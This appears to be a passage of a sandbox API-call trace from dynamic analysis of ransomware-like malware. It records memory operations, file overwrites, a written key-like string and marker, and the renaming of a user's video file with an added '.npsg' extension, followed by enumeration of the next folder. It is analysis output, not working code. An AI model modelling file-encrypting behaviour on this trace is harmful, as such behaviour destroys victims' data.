RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b78 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bd8 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b78 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b48 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b18 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86090 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.655] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x18f7c, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x18f7c, lpOverlapped=0x0) returned 1 [0238.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.655] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18f81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.655] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b88cd0 [0238.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.656] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.656] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.656] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.656] CloseHandle (hObject=0x644) returned 1 [0238.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e858 [0238.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e858 | out: hHeap=0x620000) returned 1 [0238.659] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\JB Wo1tLixiw L.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\jb wo1tlixiw l.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\JB Wo1tLixiw L.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\jb wo1tlixiw l.avi.npsg")) returned 1 [0238.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.660] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.661] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x740f9460, ftCreationTime.dwHighDateTime=0x1d5ba91, ftLastAccessTime.dwLowDateTime=0x3009e8a0, ftLastAccessTime.dwHighDateTime=0x1d5b79a, ftLastWriteTime.dwLowDateTime=0x3009e8a0, ftLastWriteTime.dwHighDateTime=0x1d5b79a, nFileSizeHigh=0x0, nFileSizeLow=0x18f81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JB Wo1tLixiw L.avi", cAlternateFileName="JBWO1T~1.AVI")) returned 0 [0238.661] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.661] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0238.662] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.667] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\") returned="kYk5K01VVlQpw\\" [0238.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.667] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0238.667] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.667] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.667] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.667] PathFindFileNameW (pszPath="") returned="" [0238.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f47cb60, ftCreationTime.dwHighDateTime=0x1d5c19d, ftLastAccessTime.dwLowDateTime=0x5bb6a8f0, ftLastAccessTime.dwHighDateTime=0x1d5b63f, ftLastWriteTime.dwLowDateTime=0x5bb6a8f0, ftLastWriteTime.dwHighDateTime=0x1d5b63f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.669] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f47cb60, ftCreationTime.dwHighDateTime=0x1d5c19d, ftLastAccessTime.dwLowDateTime=0x5bb6a8f0, ftLastAccessTime.dwHighDateTime=0x1d5b63f, ftLastWriteTime.dwLowDateTime=0x5bb6a8f0, ftLastWriteTime.dwHighDateTime=0x1d5b63f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.669] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x677a8410, ftCreationTime.dwHighDateTime=0x1d5c547, ftLastAccessTime.dwLowDateTime=0x2478a120, ftLastAccessTime.dwHighDateTime=0x1d5b9a7, ftLastWriteTime.dwLowDateTime=0x2478a120, 